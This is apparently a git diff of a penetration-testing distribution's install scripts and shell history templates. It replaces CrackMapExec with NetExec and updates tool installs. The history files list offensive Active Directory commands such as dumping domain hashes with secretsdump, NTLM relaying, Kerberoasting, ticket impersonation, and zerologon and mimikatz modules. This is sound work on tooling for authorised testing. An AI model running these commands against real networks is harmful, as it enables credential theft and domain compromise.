netexec-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.nxc/nxc.conf' -alias netexec-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.nxc/nxc.conf' \ No newline at end of file +alias netexec-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.nxc/nxc.conf' +alias crackmapexec='echo "crackmapexec has been replaced with netexec"' +alias cme=crackmapexec \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/pywhisker b/sources/assets/shells/aliases.d/pywhisker deleted file mode 100644 index 1eaf99d7e..000000000 --- a/sources/assets/shells/aliases.d/pywhisker +++ /dev/null @@ -1 +0,0 @@ -alias pywhisker.py='/opt/tools/pywhisker/venv/bin/python3 /opt/tools/pywhisker/pywhisker.py' diff --git a/sources/assets/shells/aliases.d/responder b/sources/assets/shells/aliases.d/responder index dfdfa7c85..e879929fb 100644 --- a/sources/assets/shells/aliases.d/responder +++ b/sources/assets/shells/aliases.d/responder @@ -1,8 +1,8 @@ function MultiRelay.py { (cd /opt/tools/Responder/tools/ && /opt/tools/Responder/venv/bin/python3 /opt/tools/Responder/tools/MultiRelay.py "$@") } alias RunFinger.py='/opt/tools/Responder/venv/bin/python3 /opt/tools/Responder/tools/RunFinger.py' alias Responder.py='/opt/tools/Responder/venv/bin/python3 /opt/tools/Responder/Responder.py' -alias responder-http-on="sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" -alias responder-http-off="sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" -alias responder-smb-on="sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" -alias responder-smb-off="sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" +alias responder-http-on="sed -i -E 's/^HTTP( +)= Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" +alias responder-http-off="sed -i -E 's/^HTTP( +)= On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" +alias responder-smb-on="sed -i -E 's/^SMB( +)= Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" +alias responder-smb-off="sed -i -E 's/^SMB( +)= On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" alias responder="Responder.py" \ No newline at end of file diff --git a/sources/assets/shells/aliases.d/volatility3 b/sources/assets/shells/aliases.d/volatility3 index 83e6b3111..ed951a559 100644 --- a/sources/assets/shells/aliases.d/volatility3 +++ b/sources/assets/shells/aliases.d/volatility3 @@ -1,2 +1,3 @@ +alias vol='/opt/tools/volatility3/venv/bin/python3 /opt/tools/volatility3/venv/bin/vol' alias volatility3='vol' alias vol3='volatility3' diff --git a/sources/assets/shells/history.d/adminer b/sources/assets/shells/history.d/adminer new file mode 100644 index 000000000..6f93b70cd --- /dev/null +++ b/sources/assets/shells/history.d/adminer @@ -0,0 +1,2 @@ +AD-miner -c -cf My_Report u $USERNAME -p $PASSWORD +adminer -c -cf My_Report -u $USERNAME -p $PASSWORD \ No newline at end of file diff --git a/sources/assets/shells/history.d/crackmapexec b/sources/assets/shells/history.d/crackmapexec deleted file mode 100644 index ed4af65c7..000000000 --- a/sources/assets/shells/history.d/crackmapexec +++ /dev/null @@ -1,42 +0,0 @@ -crackmapexec smb --list-modules -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST" -crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST" -crackmapexec smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt -crackmapexec smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt -crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts -crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz -crackmapexec smb "$TARGET" -u '' -p '' --pass-pol -crackmapexec smb 192.168.56.0/24 --gen-relay-list smb_targets.txt -crackmapexec smb 192.168.56.0/24 --local-auth -u '' -p '' -crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users -crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions -crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares -crackmapexec smb 192.168.56.0/24 -u '' -p '' --shares -crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac -crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam -crackmapexec smb "$IP" -u '' -p '' -M zerologon -crackmapexec smb "$IP" -u '' -p '' -M ms17-010 -crackmapexec smb "$IP" -u '' -p '' -M ioxidresolver -cme smb --list-modules -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST" -cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST" -cme smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt -cme smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt -cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts -cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz -cme smb "$TARGET" -u '' -p '' --pass-pol -cme smb 192.168.56.0/24 --gen-relay-list smb_targets.txt -cme smb 192.168.56.0/24 --local-auth -u '' -p '' -cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users -cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions -cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares -cme smb 192.168.56.0/24 -u '' -p '' --shares -cme smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac -cme smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam -cme smb "$IP" -u '' -p '' -M zerologon -cme smb "$IP" -u '' -p '' -M ms17-010 -cme smb "$IP" -u '' -p '' -M ioxidresolver diff --git a/sources/assets/shells/history.d/gobuster b/sources/assets/shells/history.d/gobuster index 79d3ef460..38f45365c 100644 --- a/sources/assets/shells/history.d/gobuster +++ b/sources/assets/shells/history.d/gobuster @@ -1,2 +1,4 @@ gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u "http://$TARGET/" gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/ +gobuster dns -d "$TARGET" -w `fzf-wordlists` +gobuster vhost -u "$TARGET" -w `fzf-wordlists` --append-domain diff --git a/sources/assets/shells/history.d/impacket b/sources/assets/shells/history.d/impacket index 9cf38f6e1..56d341ce5 100644 --- a/sources/assets/shells/history.d/impacket +++ b/sources/assets/shells/history.d/impacket @@ -3,21 +3,36 @@ reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SAM' -o '\\19 reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\SHUTDOWN' reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SECURITY' -o '\\192.168.56.1\SHUTDOWN' reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" backup -o '\\192.168.56.1\SHUTDOWN' -secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL smbserver.py -smb2support EXEGOL . -KRB5CCNAME='DC01.ccache' getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST" +secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL +secretsdump -ntds ntds.dit.save -system system.save LOCAL +secretsdump -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" +secretsdump -k "$TARGET" +secretsdump -k -outputfile "$DOMAIN" "$DC_HOST" +secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" +secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 "$DOMAIN"/Administrator@"$DC_HOST" +secretsdump -no-pass "$DOMAIN"/'DC01$'@"$DC_HOST" +secretsdump -outputfile "$DOMAIN" -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" +secretsdump -just-dc-user krbtgt -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" KRB5CCNAME='domainadmin.ccache' secretsdump -just-dc-user 'krbtgt' -dc-ip "$DC_HOST" -k -no-pass @"$DC_HOST" +KRB5CCNAME='DC01.ccache' getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST" +getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST" +getST.py -spn "host/$TARGET" -impersonate 'domainadmin' -dc-ip "$DC_IP" "$DOMAIN"/'EXEGOL-01$':'exegol4thewin' +getST.py -spn CIFS/"$TARGET" -impersonate Administrator -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD" +getTGT.py -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD" renameMachine.py -current-name 'testcomputer$' -new-name 'DC01' -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD" -getTGT.py -dc-ip "$DC_HOST" "$DOMAIN"/'DC01':'123pentest' renameMachine.py -current-name 'DC01' -new-name 'testcomputer$' -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD" -ntlmrelayx -t "http://pki.$DOMAIN/certsrv/certfnsh.asp" --adcs -ntlmrelayx -t ldap://"$DC_HOST" -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$' +ntlmrelayx -t "https://pki.$DOMAIN/certsrv/certfnsh.asp" -smb2support --adcs --template "KerberosAuthentication" +ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$' ntlmrelayx -t dcsync://"$DC_HOST" -smb2support +ntlmrelayx -t "ldaps://$DC_HOST" --http-port 80 --no-dump --no-smb-server --delegate-access --escalate-user 'EXEGOL-01$' +ntlmrelayx -t ldaps://"$DC_HOST" --http-port 80 --no-dump --no-smb-server --delegate-access --add-computer 'EXEGOL-01' 'exegol4thewin' +ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --delegate-access --add-computer 'EXEGOL-01' 'exegol4thewin' +ntlmrelayx -t ldap://"$DC_HOST" -smb2support --interactive +ntlmrelayx -tf targets.txt -w --ipv6 -smb2support --lootdir ntlmrelayx_lootdir --http-port 3128,80 Get-GPPPassword -debug -no-pass "$DC_HOST" Get-GPPPassword "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST" ms14-068.py -u "$USER"@"$DOMAIN" --rc4 "$NT_HASH" -s "$DOMAIN_SID" -d "$DC_HOST" -getST.py -k -no-pass -spn host/"$DC_HOST" "$DOMAIN"/"$USER" -secretsdump -ntds ntds.dit.save -system system.save LOCAL GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/ GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD" GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip "$DC_IP" "$DOMAIN"/"$USER" @@ -36,14 +51,6 @@ ticketer.py -nthash "$NT_HASH" -spn HOST/"$TARGET" -domain-sid "$DOMAIN_SID" -do smbclient.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" smbexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" smbexec.py -share 'ADMIN$' -k "$TARGET" -secretsdump -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" -secretsdump -just-dc-user krbtgt -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" -secretsdump -k "$TARGET" -secretsdump -k -outputfile "$DOMAIN" "$DC_HOST" -secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" -secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 "$DOMAIN"/Administrator@"$DC_HOST" -secretsdump -no-pass "$DOMAIN"/'DC01$'@"$DC_HOST" -secretsdump -outputfile "$DOMAIN" -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST" rpcdump.py "$DC_HOST" | grep -A 6 MS-RPRN rbcd.py -delegate-from "$USER" -delegate-to 'sv01$' -dc-ip "$DC_IP" -action remove "$DOMAIN"/"$USER":"$PASSWORD" rbcd.py -delegate-from "$USER" -delegate-to 'sv01$' -dc-ip "$DC_IP" -action write "$DOMAIN"/"$USER":"$PASSWORD" @@ -52,17 +59,10 @@ proxychains psexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains secretsdump -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains smbexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains wmiexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" -psexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" proxychains atexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" proxychains dcomexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET" -ntlmrelayx -t ldap://"$DC_HOST" -smb2support --escalate-user 'EXEGOL-01$' -ntlmrelayx -t ldap://"$DC_HOST" -smb2support --interactive -ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access -ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access -ntlmrelayx -tf targets.txt -w --ipv6 -smb2support --lootdir ntlmrelayx_lootdir --http-port 3128,80 lookupsid.py -hashes :"$NT_HASH" "$DOMAIN"/Administrator@"$DC_HOST" 0 -getST.py -spn "host/$TARGET" -impersonate 'domainadmin' -dc-ip "$DC_IP" "$DOMAIN"/'EXEGOL-01$':'exegol4thewin' -getST.py -spn CIFS/"$TARGET" -impersonate Administrator -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD" +psexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" atexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" diff --git a/sources/assets/shells/history.d/metasploit b/sources/assets/shells/history.d/metasploit new file mode 100644 index 000000000..3782f8968 --- /dev/null +++ b/sources/assets/shells/history.d/metasploit @@ -0,0 +1 @@ +service postgresql start diff --git a/sources/assets/shells/history.d/pywhisker b/sources/assets/shells/history.d/pywhisker index 25c0fcb5d..14e6aaab4 100644 --- a/sources/assets/shells/history.d/pywhisker +++ b/sources/assets/shells/history.d/pywhisker @@ -1 +1 @@ -pywhisker.py -v -d "$DOMAIN" -u "$USER" -H "$NT_HASH" -t 'sv01$' -a 'add' +pywhisker -v -d "$DOMAIN" -u "$USER" -H "$NT_HASH" -t 'sv01$' -a 'add' diff --git a/sources/install/package_ad.sh b/sources/install/package_ad.sh index fb3af817e..14fdd4943 100644 --- a/sources/install/package_ad.sh +++ b/sources/install/package_ad.sh @@ -101,21 +101,6 @@ function install_ldapdomaindump() { add-to-list "ldapdomaindump,https://github.com/dirkjanm/ldapdomaindump,A tool for dumping domain data from an LDAP service" } -function install_crackmapexec() { - colorecho "Installing CrackMapExec" - git -C /opt/tools/ clone --depth 1 https://github.com/Porchetta-Industries/CrackMapExec - pipx install --system-site-packages /opt/tools/CrackMapExec/ - mkdir -p ~/.cme - [[ -f ~/.cme/cme.conf ]] && mv ~/.cme/cme.conf ~/.cme/cme.conf.bak - cp -v /root/sources/assets/crackmapexec/cme.conf ~/.cme/cme.conf - # below is for having the ability to check the source code when working with modules and so on - cp -v /root/sources/assets/grc/conf.cme /usr/share/grc/conf.cme - add-aliases crackmapexec - add-history crackmapexec - add-test-command "crackmapexec --help" - add-to-list "crackmapexec,https://github.com/Porchetta-Industries/CrackMapExec,Network scanner." -} - function install_bloodhound-py() { colorecho "Installing and Python ingestor for BloodHound" pipx install --system-site-packages git+https://github.com/fox-it/BloodHound.py @@ -191,6 +176,7 @@ function install_bloodhound-ce() { cd /opt/tools/BloodHound-CE/src/packages/javascript/bh-shared-ui || exit zsh -c "source ~/.zshrc && nvm install 18 && nvm use 18 && yarn install --immutable && yarn build" cd /opt/tools/BloodHound-CE/src/ || exit + asdf local golang 1.23.0 catch_and_retry VERSION=v999.999.999 CHECKOUT_HASH="" python3 ./packages/python/beagle/main.py build --verbose --ci # Ingestors: bloodhound-ce requires the ingestors to be in a specific directory and checks that when starting, they need to be downloaded here @@ -440,7 +426,7 @@ function install_pypykatz() { colorecho "Installing pypykatz" # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -679,7 +665,7 @@ function install_pygpoabuse() { pip3 install -r requirements.txt # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -782,7 +768,7 @@ function install_pkinittools() { pip3 install -r requirements.txt # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -797,15 +783,10 @@ function install_pkinittools() { function install_pywhisker() { colorecho "Installing pyWhisker" - git -C /opt/tools/ clone --depth 1 https://github.com/ShutdownRepo/pywhisker - cd /opt/tools/pywhisker || exit - python3 -m venv --system-site-packages ./venv - source ./venv/bin/activate - pip3 install -r requirements.txt - deactivate - add-aliases pywhisker + # CODE-CHECK-WHITELIST=add-aliases + pipx install --system-site-packages git+https://github.com/ShutdownRepo/pywhisker add-history pywhisker - add-test-command "pywhisker.py --help" + add-test-command "pywhisker --help" add-to-list "pywhisker,https://github.com/ShutdownRepo/pywhisker,PyWhisker is a Python equivalent of the original Whisker made by Elad Shamir and written in C#. This tool allows users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on a Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals made by podalirius." } @@ -964,7 +945,7 @@ function install_ldaprelayscan() { pip3 install -r requirements.txt # without following fix, tool raises "oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto" # see https://github.com/wbond/oscrypto/issues/78 and https://github.com/wbond/oscrypto/issues/75 - local temp_fix_limit="2024-06-20" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -1030,34 +1011,55 @@ function install_rusthound() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing RustHound" fapt gcc clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit musl-tools gcc-mingw-w64-x86-64 - git -C /opt/tools/ clone --depth 1 https://github.com/OPENCYBER-FR/RustHound + git -C /opt/tools/ clone --depth 1 https://github.com/NH-RED-TEAM/RustHound cd /opt/tools/RustHound || exit # Sourcing rustup shell setup, so that rust binaries are found when installing cme source "$HOME/.cargo/env" + # Temp fix for : https://github.com/NH-RED-TEAM/RustHound/issues/32 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + cargo update -p time + fi cargo build --release + # Temp fix for : https://github.com/NH-RED-TEAM/RustHound/issues/32 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + cargo update -p time + fi # Clean dependencies used to build the binary rm -rf target/release/{deps,build} ln -s /opt/tools/RustHound/target/release/rusthound /opt/tools/bin/rusthound add-history rusthound add-test-command "rusthound --help" - add-to-list "rusthound,https://github.com/OPENCYBER-FR/RustHound,BloodHound ingestor in Rust." + add-to-list "rusthound,https://github.com/NH-RED-TEAM/RustHound,BloodHound ingestor in Rust." } function install_rusthound-ce() { # CODE-CHECK-WHITELIST=add-aliases colorecho "Installing RustHound for BloodHound-CE" fapt gcc clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit musl-tools gcc-mingw-w64-x86-64 - git -C /opt/tools/ clone --depth 1 --branch v2 https://github.com/OPENCYBER-FR/RustHound RustHound-CE + git -C /opt/tools/ clone --depth 1 --branch v2 https://github.com/NH-RED-TEAM/RustHound RustHound-CE cd /opt/tools/RustHound-CE || exit # Sourcing rustup shell setup, so that rust binaries are found when installing cme source "$HOME/.cargo/env" + # Temp fix for : https://github.com/NH-RED-TEAM/RustHound/issues/32 + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + cargo update -p time@0.3.28 + fi cargo build --release # Clean dependencies used to build the binary rm -rf target/release/{deps,build} ln -v -s /opt/tools/RustHound-CE/target/release/rusthound /opt/tools/bin/rusthound-ce add-history rusthound-ce add-test-command "rusthound-ce --help" - add-to-list "rusthound (v2),https://github.com/OPENCYBER-FR/RustHound,BloodHound-CE ingestor in Rust." + add-to-list "rusthound (v2),https://github.com/NH-RED-TEAM/RustHound,BloodHound-CE ingestor in Rust." } function install_certsync() { @@ -1214,7 +1216,6 @@ function install_netexec() { mkdir -p ~/.nxc [[ -f ~/.nxc/nxc.conf ]] && mv ~/.nxc/nxc.conf ~/.nxc/nxc.conf.bak cp -v /root/sources/assets/netexec/nxc.conf ~/.nxc/nxc.conf - cp -v /root/sources/assets/grc/conf.cme /usr/share/grc/conf.cme add-aliases netexec add-history netexec add-test-command "netexec --help" @@ -1381,6 +1382,15 @@ function install_conpass() { add-to-list "conpass,https://github.com/login-securite/conpass,Python tool for continuous password spraying taking into account the password policy." } +function install_adminer() { + colorecho "Installing adminer" + pipx install git+https://github.com/Mazars-Tech/AD_Miner + add-aliases adminer + add-history adminer + add-test-command "adminer --help" + add-to-list "AD-miner,https://github.com/Mazars-Tech/AD_Miner,Active Directory audit tool that leverages cypher queries." +} + # Package dedicated to internal Active Directory tools function package_ad() { set_env @@ -1392,7 +1402,6 @@ function package_ad() { install_pretender install_responder # LLMNR, NBT-NS and MDNS poisoner install_ldapdomaindump - install_crackmapexec # Network scanner install_sprayhound # Password spraying tool install_smartbrute # Password spraying tool install_bloodhound-py # ingestor for legacy BloodHound @@ -1486,6 +1495,7 @@ function package_ad() { install_sccmwtf # This code is designed for exploring SCCM in a lab. install_smbclientng install_conpass # Python tool for continuous password spraying taking into account the password policy. + install_adminer end_time=$(date +%s) local elapsed_time=$((end_time - start_time)) colorecho "Package ad completed in $elapsed_time seconds." diff --git a/sources/install/package_base.sh b/sources/install/package_base.sh index d0d051a94..863345975 100644 --- a/sources/install/package_base.sh +++ b/sources/install/package_base.sh @@ -51,10 +51,22 @@ function install_go() { # CODE-CHECK-WHITELIST=add-aliases,add-to-list,add-history colorecho "Installing go (Golang)" asdf plugin add golang https://github.com/asdf-community/asdf-golang.git - asdf install golang latest # 1.19 needed by sliver asdf install golang 1.19 - asdf global golang latest + #asdf install golang latest + #asdf global golang latest + # With golang 1.23 many package build are broken, temp fix to use 1.22.2 as golang latest + local temp_fix_limit="2024-11-01" + if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then + criticalecho "Temp fix expired. Exiting." + else + # 1.23 needed by BloodHound-CE + asdf install golang 1.23.0 + # Default GO version: 1.22.2 + asdf install golang 1.22.2 + asdf global golang 1.22.2 + fi + # if command -v /usr/local/go/bin/go &>/dev/null; then # return # fi @@ -177,7 +189,8 @@ function install_rvm() { rvm autolibs read-fail rvm rvmrc warning ignore allGemfiles rvm use 3.2.2@default - rvm install ruby-3.1.2 + rvm install ruby-3.1.2 # needed by cewl, pass-station, evil-winrm + rvm install ruby-3.1.5 # needed metasploit-framework rvm get head gem update add-test-command "rvm --version" @@ -420,6 +433,8 @@ function package_base() { install_exegol-history fapt software-properties-common add_debian_repository_components + cp -v /root/sources/assets/apt/sources.list.d/* /etc/apt/sources.list.d/ + cp -v /root/sources/assets/apt/preferences.d/* /etc/apt/preferences.d/ apt-get update colorecho "Starting main programs install" fapt man git lsb-release pciutils pkg-config zip unzip kmod gnupg2 wget \ diff --git a/sources/install/package_c2.sh b/sources/install/package_c2.sh index cd94a0b6f..b115873e8 100644 --- a/sources/install/package_c2.sh +++ b/sources/install/package_c2.sh @@ -17,18 +17,25 @@ function install_pwncat() { } function install_metasploit() { - # CODE-CHECK-WHITELIST=add-history colorecho "Installing Metasploit" fapt libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev git -C /opt/tools clone --depth 1 https://github.com/rapid7/metasploit-framework.git - cd /opt/tools/metasploit-framework || exit - rvm use 3.2.2@metasploit --create + cd /opt/tools/metasploit-framework || exit # rvm gemset ruby-3.1.5@metasploit-framework should be auto setup here + + # Fix msfupdate git config requirements + git config user.name "exegol" + git config user.email "exegol@localhost" + + # install dep manager gem install bundler bundle install - # Add this dependency to make the pattern_create.rb script work + + # Add missing deps + gem install rex gem install rex-text - # fixes 'You have already activated timeout 0.3.1, but your Gemfile requires timeout 0.4.1. Since timeout is a default gem, you can either remove your dependency on it or try updating to a newer version of bundler that supports timeout as a default gem.' - local temp_fix_limit="2024-08-25" + + # fixes 'You have already activated timeout 0.2.0, but your Gemfile requires timeout 0.4.1. Since timeout is a default gem, you can either remove your dependency on it or try updating to a newer version of bundler that supports timeout as a default gem.' + local temp_fix_limit="2025-06-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then criticalecho "Temp fix expired. Exiting." else @@ -40,11 +47,13 @@ function install_metasploit() { fapt postgresql cp -r /root/.bundle /var/lib/postgresql chown -R postgres:postgres /var/lib/postgresql/.bundle - sudo -u postgres sh -c "git config --global --add safe.directory /opt/tools/metasploit-framework && cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb init" + chmod -R o+rx /opt/tools/metasploit-framework/ + sudo -u postgres sh -c "git config --global --add safe.directory /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.1.5@metasploit-framework/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb init" cp -r /var/lib/postgresql/.msf4 /root add-aliases metasploit - add-test-command "msfconsole --help" + add-history metasploit + add-test-command "msfconsole --version" add-test-command "msfdb --help" add-test-command "msfvenom --list platforms" add-to-list "metasploit,https://github.com/rapid7/metasploit-framework,A popular penetration testing framework that includes many exploits and payloads" @@ -67,7 +76,7 @@ function install_sliver() { # function below will serve as a reminder to update sliver's version regularly # when the pipeline fails because the time limit is reached: update the version and the time limit # or check if it's possible to make this dynamic - local temp_fix_limit="2024-08-25" + local temp_fix_limit="2024-11-01" if [[ "$(date +%Y%m%d)" -gt "$(date -d $temp_fix_limit +%Y%m%d)" ]]; then 